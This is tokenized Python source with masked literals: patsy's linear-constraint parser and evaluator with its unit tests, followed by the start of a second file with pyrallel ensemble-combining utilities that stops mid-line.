tools import assert_raises <EOL> assert_raises ( ValueError , LinearConstraint , [ "<STR_LIT:a>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:2> ] ] ) <EOL> assert_raises ( ValueError , LinearConstraint , [ "<STR_LIT:a>" ] , [ [ [ <NUM_LIT:1> ] ] ] ) <EOL> assert_raises ( ValueError , LinearConstraint , [ "<STR_LIT:a>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:2> ] ] , [ <NUM_LIT:3> , <NUM_LIT:4> ] ) <EOL> assert_raises ( ValueError , LinearConstraint , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:2> ] ] , [ <NUM_LIT:3> , <NUM_LIT:4> ] ) <EOL> assert_raises ( ValueError , LinearConstraint , [ "<STR_LIT:a>" ] , [ [ <NUM_LIT:0> ] ] ) <EOL> assert_raises ( ValueError , LinearConstraint , [ "<STR_LIT:a>" ] , [ [ <NUM_LIT:1> ] ] , [ [ ] ] ) <EOL> assert_raises ( ValueError , LinearConstraint , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ ] ) <EOL> assert_raises ( ValueError , LinearConstraint , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , <EOL> np . zeros ( ( <NUM_LIT:0> , <NUM_LIT:2> ) ) ) <EOL> assert_no_pickling ( lc ) <EOL> def test_LinearConstraint_combine ( ) : <EOL> comb = LinearConstraint . combine ( [ LinearConstraint ( [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ) , <EOL> LinearConstraint ( [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> ] ) ] ) <EOL> assert comb . variable_names == [ "<STR_LIT:a>" , "<STR_LIT:b>" ] <EOL> from numpy . testing . utils import assert_equal <EOL> assert_equal ( comb . coefs , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ] ) <EOL> assert_equal ( comb . constants , [ [ <NUM_LIT:0> ] , [ <NUM_LIT:1> ] ] ) <EOL> from nose . tools import assert_raises <EOL> assert_raises ( ValueError , LinearConstraint . combine , [ ] ) <EOL> assert_raises ( ValueError , LinearConstraint . 
combine , <EOL> [ LinearConstraint ( [ "<STR_LIT:a>" ] , [ <NUM_LIT:1> ] ) , LinearConstraint ( [ "<STR_LIT:b>" ] , [ <NUM_LIT:1> ] ) ] ) <EOL> _ops = [ <EOL> Operator ( "<STR_LIT:U+002C>" , <NUM_LIT:2> , - <NUM_LIT:100> ) , <EOL> Operator ( "<STR_LIT:=>" , <NUM_LIT:2> , <NUM_LIT:0> ) , <EOL> Operator ( "<STR_LIT:+>" , <NUM_LIT:1> , <NUM_LIT:100> ) , <EOL> Operator ( "<STR_LIT:->" , <NUM_LIT:1> , <NUM_LIT:100> ) , <EOL> Operator ( "<STR_LIT:+>" , <NUM_LIT:2> , <NUM_LIT:100> ) , <EOL> Operator ( "<STR_LIT:->" , <NUM_LIT:2> , <NUM_LIT:100> ) , <EOL> Operator ( "<STR_LIT:*>" , <NUM_LIT:2> , <NUM_LIT:200> ) , <EOL> Operator ( "<STR_LIT:/>" , <NUM_LIT:2> , <NUM_LIT:200> ) , <EOL> ] <EOL> _atomic = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> def _token_maker ( type , string ) : <EOL> def make_token ( scanner , token_string ) : <EOL> if type == "<STR_LIT>" : <EOL> actual_type = token_string <EOL> else : <EOL> actual_type = type <EOL> return Token ( actual_type , <EOL> Origin ( string , * scanner . match . span ( ) ) , <EOL> token_string ) <EOL> return make_token <EOL> def _tokenize_constraint ( string , variable_names ) : <EOL> lparen_re = r"<STR_LIT>" <EOL> rparen_re = r"<STR_LIT>" <EOL> op_re = "<STR_LIT:|>" . join ( [ re . escape ( op . token_type ) for op in _ops ] ) <EOL> num_re = r"<STR_LIT>" <EOL> whitespace_re = r"<STR_LIT>" <EOL> variable_names = sorted ( variable_names , key = len , reverse = True ) <EOL> variable_re = "<STR_LIT:|>" . join ( [ re . escape ( n ) for n in variable_names ] ) <EOL> lexicon = [ <EOL> ( lparen_re , _token_maker ( Token . LPAREN , string ) ) , <EOL> ( rparen_re , _token_maker ( Token . RPAREN , string ) ) , <EOL> ( op_re , _token_maker ( "<STR_LIT>" , string ) ) , <EOL> ( variable_re , _token_maker ( "<STR_LIT>" , string ) ) , <EOL> ( num_re , _token_maker ( "<STR_LIT>" , string ) ) , <EOL> ( whitespace_re , None ) , <EOL> ] <EOL> scanner = Scanner ( lexicon ) <EOL> tokens , leftover = scanner . 
scan ( string ) <EOL> if leftover : <EOL> offset = len ( string ) - len ( leftover ) <EOL> raise PatsyError ( "<STR_LIT>" , <EOL> Origin ( string , offset , offset + <NUM_LIT:1> ) ) <EOL> return tokens <EOL> def test__tokenize_constraint ( ) : <EOL> code = "<STR_LIT>" <EOL> tokens = _tokenize_constraint ( code , [ "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:q>" ] ) <EOL> expecteds = [ ( "<STR_LIT>" , <NUM_LIT:0> , <NUM_LIT:1> , "<STR_LIT:2>" ) , <EOL> ( "<STR_LIT:*>" , <NUM_LIT:2> , <NUM_LIT:3> , "<STR_LIT:*>" ) , <EOL> ( Token . LPAREN , <NUM_LIT:4> , <NUM_LIT:5> , "<STR_LIT:(>" ) , <EOL> ( "<STR_LIT>" , <NUM_LIT:5> , <NUM_LIT:6> , "<STR_LIT:a>" ) , <EOL> ( "<STR_LIT:+>" , <NUM_LIT:7> , <NUM_LIT:8> , "<STR_LIT:+>" ) , <EOL> ( "<STR_LIT>" , <NUM_LIT:9> , <NUM_LIT:10> , "<STR_LIT:b>" ) , <EOL> ( Token . RPAREN , <NUM_LIT:10> , <NUM_LIT:11> , "<STR_LIT:)>" ) , <EOL> ( "<STR_LIT:=>" , <NUM_LIT:12> , <NUM_LIT> , "<STR_LIT:=>" ) , <EOL> ( "<STR_LIT>" , <NUM_LIT> , <NUM_LIT:15> , "<STR_LIT:q>" ) ] <EOL> for got , expected in zip ( tokens , expecteds ) : <EOL> assert isinstance ( got , Token ) <EOL> assert got . type == expected [ <NUM_LIT:0> ] <EOL> assert got . origin == Origin ( code , expected [ <NUM_LIT:1> ] , expected [ <NUM_LIT:2> ] ) <EOL> assert got . extra == expected [ <NUM_LIT:3> ] <EOL> from nose . tools import assert_raises <EOL> assert_raises ( PatsyError , _tokenize_constraint , "<STR_LIT>" , [ "<STR_LIT:b>" ] ) <EOL> _tokenize_constraint ( "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> for names in ( [ "<STR_LIT:a>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT:a>" ] ) : <EOL> tokens = _tokenize_constraint ( "<STR_LIT>" , names ) <EOL> assert len ( tokens ) == <NUM_LIT:3> <EOL> assert [ t . extra for t in tokens ] == [ "<STR_LIT:a>" , "<STR_LIT>" , "<STR_LIT:a>" ] <EOL> tokens = _tokenize_constraint ( "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> assert len ( tokens ) == <NUM_LIT:4> <EOL> assert [ t . 
type for t in tokens ] == [ "<STR_LIT>" , "<STR_LIT:*>" , "<STR_LIT>" , "<STR_LIT:U+002C>" ] <EOL> assert [ t . extra for t in tokens ] == [ "<STR_LIT:2>" , "<STR_LIT:*>" , "<STR_LIT>" , "<STR_LIT:U+002C>" ] <EOL> def parse_constraint ( string , variable_names ) : <EOL> return infix_parse ( _tokenize_constraint ( string , variable_names ) , <EOL> _ops , _atomic ) <EOL> class _EvalConstraint ( object ) : <EOL> def __init__ ( self , variable_names ) : <EOL> self . _variable_names = variable_names <EOL> self . _N = len ( variable_names ) <EOL> self . _dispatch = { <EOL> ( "<STR_LIT>" , <NUM_LIT:0> ) : self . _eval_variable , <EOL> ( "<STR_LIT>" , <NUM_LIT:0> ) : self . _eval_number , <EOL> ( "<STR_LIT:+>" , <NUM_LIT:1> ) : self . _eval_unary_plus , <EOL> ( "<STR_LIT:->" , <NUM_LIT:1> ) : self . _eval_unary_minus , <EOL> ( "<STR_LIT:+>" , <NUM_LIT:2> ) : self . _eval_binary_plus , <EOL> ( "<STR_LIT:->" , <NUM_LIT:2> ) : self . _eval_binary_minus , <EOL> ( "<STR_LIT:*>" , <NUM_LIT:2> ) : self . _eval_binary_multiply , <EOL> ( "<STR_LIT:/>" , <NUM_LIT:2> ) : self . _eval_binary_div , <EOL> ( "<STR_LIT:=>" , <NUM_LIT:2> ) : self . _eval_binary_eq , <EOL> ( "<STR_LIT:U+002C>" , <NUM_LIT:2> ) : self . _eval_binary_comma , <EOL> } <EOL> def is_constant ( self , coefs ) : <EOL> return np . all ( coefs [ : self . _N ] == <NUM_LIT:0> ) <EOL> def _eval_variable ( self , tree ) : <EOL> var = tree . token . extra <EOL> coefs = np . zeros ( ( self . _N + <NUM_LIT:1> , ) , dtype = float ) <EOL> coefs [ self . _variable_names . index ( var ) ] = <NUM_LIT:1> <EOL> return coefs <EOL> def _eval_number ( self , tree ) : <EOL> coefs = np . zeros ( ( self . _N + <NUM_LIT:1> , ) , dtype = float ) <EOL> coefs [ - <NUM_LIT:1> ] = float ( tree . token . extra ) <EOL> return coefs <EOL> def _eval_unary_plus ( self , tree ) : <EOL> return self . eval ( tree . args [ <NUM_LIT:0> ] ) <EOL> def _eval_unary_minus ( self , tree ) : <EOL> return - <NUM_LIT:1> * self . eval ( tree . 
args [ <NUM_LIT:0> ] ) <EOL> def _eval_binary_plus ( self , tree ) : <EOL> return self . eval ( tree . args [ <NUM_LIT:0> ] ) + self . eval ( tree . args [ <NUM_LIT:1> ] ) <EOL> def _eval_binary_minus ( self , tree ) : <EOL> return self . eval ( tree . args [ <NUM_LIT:0> ] ) - self . eval ( tree . args [ <NUM_LIT:1> ] ) <EOL> def _eval_binary_div ( self , tree ) : <EOL> left = self . eval ( tree . args [ <NUM_LIT:0> ] ) <EOL> right = self . eval ( tree . args [ <NUM_LIT:1> ] ) <EOL> if not self . is_constant ( right ) : <EOL> raise PatsyError ( "<STR_LIT>" <EOL> "<STR_LIT>" , tree . args [ <NUM_LIT:1> ] ) <EOL> return left / right [ - <NUM_LIT:1> ] <EOL> def _eval_binary_multiply ( self , tree ) : <EOL> left = self . eval ( tree . args [ <NUM_LIT:0> ] ) <EOL> right = self . eval ( tree . args [ <NUM_LIT:1> ] ) <EOL> if self . is_constant ( left ) : <EOL> return left [ - <NUM_LIT:1> ] * right <EOL> elif self . is_constant ( right ) : <EOL> return left * right [ - <NUM_LIT:1> ] <EOL> else : <EOL> raise PatsyError ( "<STR_LIT>" <EOL> "<STR_LIT>" , tree ) <EOL> def _eval_binary_eq ( self , tree ) : <EOL> args = list ( tree . args ) <EOL> constraints = [ ] <EOL> for i , arg in enumerate ( args ) : <EOL> if arg . type == "<STR_LIT:=>" : <EOL> constraints . append ( self . eval ( arg , constraint = True ) ) <EOL> args [ i ] = arg . args [ <NUM_LIT:1> - i ] <EOL> left = self . eval ( args [ <NUM_LIT:0> ] ) <EOL> right = self . eval ( args [ <NUM_LIT:1> ] ) <EOL> coefs = left [ : self . _N ] - right [ : self . _N ] <EOL> if np . all ( coefs == <NUM_LIT:0> ) : <EOL> raise PatsyError ( "<STR_LIT>" , tree ) <EOL> constant = - left [ - <NUM_LIT:1> ] + right [ - <NUM_LIT:1> ] <EOL> constraint = LinearConstraint ( self . _variable_names , coefs , constant ) <EOL> constraints . append ( constraint ) <EOL> return LinearConstraint . combine ( constraints ) <EOL> def _eval_binary_comma ( self , tree ) : <EOL> left = self . eval ( tree . 
args [ <NUM_LIT:0> ] , constraint = True ) <EOL> right = self . eval ( tree . args [ <NUM_LIT:1> ] , constraint = True ) <EOL> return LinearConstraint . combine ( [ left , right ] ) <EOL> def eval ( self , tree , constraint = False ) : <EOL> key = ( tree . type , len ( tree . args ) ) <EOL> assert key in self . _dispatch <EOL> val = self . _dispatch [ key ] ( tree ) <EOL> if constraint : <EOL> if isinstance ( val , LinearConstraint ) : <EOL> return val <EOL> else : <EOL> assert val . size == self . _N + <NUM_LIT:1> <EOL> if np . all ( val [ : self . _N ] == <NUM_LIT:0> ) : <EOL> raise PatsyError ( "<STR_LIT>" , <EOL> tree ) <EOL> return LinearConstraint ( self . _variable_names , <EOL> val [ : self . _N ] , <EOL> - val [ - <NUM_LIT:1> ] ) <EOL> else : <EOL> if isinstance ( val , LinearConstraint ) : <EOL> raise PatsyError ( "<STR_LIT>" , tree ) <EOL> return val <EOL> def linear_constraint ( constraint_like , variable_names ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( constraint_like , LinearConstraint ) : <EOL> if constraint_like . variable_names != variable_names : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( constraint_like . variable_names , <EOL> variable_names ) ) <EOL> return constraint_like <EOL> if isinstance ( constraint_like , Mapping ) : <EOL> coefs = np . zeros ( ( len ( constraint_like ) , len ( variable_names ) ) , <EOL> dtype = float ) <EOL> constants = np . zeros ( len ( constraint_like ) ) <EOL> used = set ( ) <EOL> for i , ( name , value ) in enumerate ( six . iteritems ( constraint_like ) ) : <EOL> if name in variable_names : <EOL> idx = variable_names . index ( name ) <EOL> elif isinstance ( name , six . integer_types ) : <EOL> idx = name <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" <EOL> % ( name , ) ) <EOL> if idx in used : <EOL> raise ValueError ( "<STR_LIT>" <EOL> % ( variable_names [ idx ] , ) ) <EOL> used . 
add ( idx ) <EOL> coefs [ i , idx ] = <NUM_LIT:1> <EOL> constants [ i ] = value <EOL> return LinearConstraint ( variable_names , coefs , constants ) <EOL> if isinstance ( constraint_like , str ) : <EOL> constraint_like = [ constraint_like ] <EOL> if ( isinstance ( constraint_like , list ) <EOL> and constraint_like <EOL> and isinstance ( constraint_like [ <NUM_LIT:0> ] , str ) ) : <EOL> constraints = [ ] <EOL> for code in constraint_like : <EOL> if not isinstance ( code , str ) : <EOL> raise ValueError ( "<STR_LIT>" % ( code , ) ) <EOL> tree = parse_constraint ( code , variable_names ) <EOL> evaluator = _EvalConstraint ( variable_names ) <EOL> constraints . append ( evaluator . eval ( tree , constraint = True ) ) <EOL> return LinearConstraint . combine ( constraints ) <EOL> if isinstance ( constraint_like , tuple ) : <EOL> if len ( constraint_like ) != <NUM_LIT:2> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> coef , constants = constraint_like <EOL> return LinearConstraint ( variable_names , coef , constants ) <EOL> coefs = np . asarray ( constraint_like , dtype = float ) <EOL> return LinearConstraint ( variable_names , coefs ) <EOL> def _check_lincon ( input , varnames , coefs , constants ) : <EOL> from numpy . testing . utils import assert_equal <EOL> got = linear_constraint ( input , varnames ) <EOL> print ( "<STR_LIT>" , got ) <EOL> expected = LinearConstraint ( varnames , coefs , constants ) <EOL> print ( "<STR_LIT>" , expected ) <EOL> assert_equal ( got . variable_names , expected . variable_names ) <EOL> assert_equal ( got . coefs , expected . coefs ) <EOL> assert_equal ( got . constants , expected . constants ) <EOL> assert_equal ( got . coefs . dtype , np . dtype ( float ) ) <EOL> assert_equal ( got . constants . dtype , np . dtype ( float ) ) <EOL> def test_linear_constraint ( ) : <EOL> from nose . tools import assert_raises <EOL> from patsy . 
compat import OrderedDict <EOL> t = _check_lincon <EOL> t ( LinearConstraint ( [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ <NUM_LIT:2> , <NUM_LIT:3> ] ) , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:2> , <NUM_LIT:3> ] ] , [ [ <NUM_LIT:0> ] ] ) <EOL> assert_raises ( ValueError , linear_constraint , <EOL> LinearConstraint ( [ "<STR_LIT:b>" , "<STR_LIT:a>" ] , [ <NUM_LIT:2> , <NUM_LIT:3> ] ) , <EOL> [ "<STR_LIT:a>" , "<STR_LIT:b>" ] ) <EOL> t ( { "<STR_LIT:a>" : <NUM_LIT:2> } , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:2> ] ] ) <EOL> t ( OrderedDict ( [ ( "<STR_LIT:a>" , <NUM_LIT:2> ) , ( "<STR_LIT:b>" , <NUM_LIT:3> ) ] ) , <EOL> [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ] , [ [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] ) <EOL> t ( OrderedDict ( [ ( "<STR_LIT:a>" , <NUM_LIT:2> ) , ( "<STR_LIT:b>" , <NUM_LIT:3> ) ] ) , <EOL> [ "<STR_LIT:b>" , "<STR_LIT:a>" ] , [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] ) <EOL> t ( { <NUM_LIT:0> : <NUM_LIT:2> } , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:2> ] ] ) <EOL> t ( OrderedDict ( [ ( <NUM_LIT:0> , <NUM_LIT:2> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) ] ) , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ] , [ [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] ) <EOL> t ( OrderedDict ( [ ( "<STR_LIT:a>" , <NUM_LIT:2> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) ] ) , <EOL> [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ] , [ [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] ) <EOL> assert_raises ( ValueError , linear_constraint , { "<STR_LIT:q>" : <NUM_LIT:1> } , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] ) <EOL> assert_raises ( ValueError , linear_constraint , { "<STR_LIT:a>" : <NUM_LIT:1> , <NUM_LIT:0> : <NUM_LIT:2> } , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] ) <EOL> t ( np . 
array ( [ <NUM_LIT:2> , <NUM_LIT:3> ] ) , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:2> , <NUM_LIT:3> ] ] , [ [ <NUM_LIT:0> ] ] ) <EOL> t ( np . array ( [ [ <NUM_LIT:2> , <NUM_LIT:3> ] , [ <NUM_LIT:4> , <NUM_LIT:5> ] ] ) , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:2> , <NUM_LIT:3> ] , [ <NUM_LIT:4> , <NUM_LIT:5> ] ] , [ [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:2> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:2> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:2> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:1> ] ] , [ [ <NUM_LIT:3> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ] , [ [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:3> ] , [ <NUM_LIT:2> ] ] ) <EOL> t ( [ "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ] , [ [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] ) <EOL> assert_raises ( ValueError , linear_constraint , [ "<STR_LIT:a>" , { "<STR_LIT:b>" : <NUM_LIT:0> } ] , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , <EOL> [ [ <NUM_LIT:2> , <NUM_LIT> / <NUM_LIT:3> + <NUM_LIT:1> ] ] , [ [ <NUM_LIT:7> - <NUM_LIT> / <NUM_LIT:4> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ - <NUM_LIT:2> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:0> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , - <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:1> ] ] , [ [ <NUM_LIT:0> ] , [ <NUM_LIT:2> ] ] ) <EOL> t ( "<STR_LIT>" 
, [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , <EOL> [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:1> ] , [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:2> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:0> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ - <NUM_LIT:1> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:1> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:0> , <NUM_LIT:2> ] ] , [ [ <NUM_LIT:0> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , - <NUM_LIT:1> ] ] , [ [ <NUM_LIT:1> ] , [ - <NUM_LIT:1> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:0> , - <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ] , [ [ - <NUM_LIT:1> ] , [ <NUM_LIT:1> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:c>" ] , <EOL> [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> , - <NUM_LIT:1> ] ] , [ [ <NUM_LIT:1> ] , [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT>" ] , [ [ <NUM_LIT:0> , <NUM_LIT:1> ] ] , [ [ <NUM_LIT:2> ] ] ) <EOL> t ( ( [ <NUM_LIT:10> , <NUM_LIT:20> ] , [ <NUM_LIT:30> ] ) , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:10> , <NUM_LIT:20> ] ] , [ [ <NUM_LIT:30> ] ] ) <EOL> t ( ( [ [ <NUM_LIT:10> , <NUM_LIT:20> ] , [ <NUM_LIT:20> , <NUM_LIT> ] ] , [ [ <NUM_LIT:30> ] , [ <NUM_LIT> ] ] ) , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , <EOL> [ [ <NUM_LIT:10> , <NUM_LIT:20> ] , [ <NUM_LIT:20> , <NUM_LIT> ] ] , [ [ <NUM_LIT:30> ] , [ <NUM_LIT> ] ] ) <EOL> assert_raises ( ValueError , linear_constraint , <EOL> ( [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ) , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] ) <EOL> assert_raises ( ValueError , linear_constraint , ( [ <NUM_LIT:1> , <NUM_LIT:0> ] , ) 
, [ "<STR_LIT:a>" , "<STR_LIT:b>" ] ) <EOL> t ( [ <NUM_LIT:10> , <NUM_LIT:20> ] , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:10> , <NUM_LIT:20> ] ] , [ [ <NUM_LIT:0> ] ] ) <EOL> t ( [ [ <NUM_LIT:10> , <NUM_LIT:20> ] , [ <NUM_LIT:20> , <NUM_LIT> ] ] , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:10> , <NUM_LIT:20> ] , [ <NUM_LIT:20> , <NUM_LIT> ] ] , [ [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ] ) <EOL> t ( np . array ( [ <NUM_LIT:10> , <NUM_LIT:20> ] ) , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:10> , <NUM_LIT:20> ] ] , [ [ <NUM_LIT:0> ] ] ) <EOL> t ( np . array ( [ [ <NUM_LIT:10> , <NUM_LIT:20> ] , [ <NUM_LIT:20> , <NUM_LIT> ] ] ) , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , <EOL> [ [ <NUM_LIT:10> , <NUM_LIT:20> ] , [ <NUM_LIT:20> , <NUM_LIT> ] ] , [ [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ] ) <EOL> assert_raises ( ValueError , linear_constraint , None , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] ) <EOL> _parse_eval_error_tests = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> from patsy . parse_formula import _parsing_error_test <EOL> def test_eval_errors ( ) : <EOL> def doit ( bad_code ) : <EOL> return linear_constraint ( bad_code , [ "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:c>" ] ) <EOL> _parsing_error_test ( doit , _parse_eval_error_tests ) </s>
<s> """<STR_LIT>""" <EOL> import uuid <EOL> import os <EOL> from random import Random <EOL> from copy import copy <EOL> from IPython . parallel import interactive <EOL> from sklearn . base import clone <EOL> from sklearn . externals import joblib <EOL> from pyrallel . common import TaskManager <EOL> from pyrallel . mmap_utils import host_dump <EOL> try : <EOL> basestring <EOL> except NameError : <EOL> basestring = ( str , bytes ) <EOL> def combine ( all_ensembles ) : <EOL> """<STR_LIT>""" <EOL> final_ensemble = copy ( all_ensembles [ <NUM_LIT:0> ] ) <EOL> final_ensemble . estimators_ = [ ] <EOL> for ensemble in all_ensembles : <EOL> final_ensemble . estimators_ += ensemble . estimators_ <EOL> final_ensemble . n_estimators = len ( final_ensemble . estimators_ ) <EOL> return final_ensemble <EOL> def sub_ensemble ( ensemble , n_estimators , seed = None ) : <EOL> """<STR_LIT>""" <EOL> rng = Random ( seed ) <EOL> final_ensemble = copy ( ensemble ) <EOL> if n_estimators > len ( ensemble . estimators_ ) : <EOL> raise ValueError ( <EOL> "<STR_LIT>" <EOL> % ( n_estimators , len ( ensemble . estimators_ ) ) ) <EOL> final_ensemble . estimators_ = rng . sample ( <EOL> ensemble . estimators_ , n_estimators ) <EOL> final_ensemble . n_estimators = len ( final_ensemble . estimators_ ) <EOL> return final_ensemble <EOL> @ interactive <EOL> def train_model ( model , data_filename , model_filename = None , <EOL> random_state = None ) : <EOL> from sklearn . externals import joblib <EOL> X , y , sample_weight = joblib . load ( data_filename , mmap_mode = '<STR_LIT:r>' ) <EOL> model . set_params ( random_state = random_state ) <EOL> if sample_weight is not None : <EOL> model . fit ( X , y , sample_weight = sample_weight ) <EOL> else : <EOL> model . fit ( X , y ) <EOL> for estimator in model . estimators_ : <EOL> if ( hasattr ( estimator , '<STR_LIT>' ) <EOL> and hasattr ( estimator . tree_ , '<STR_LIT>' ) ) : <EOL> estimator . tree_ . 
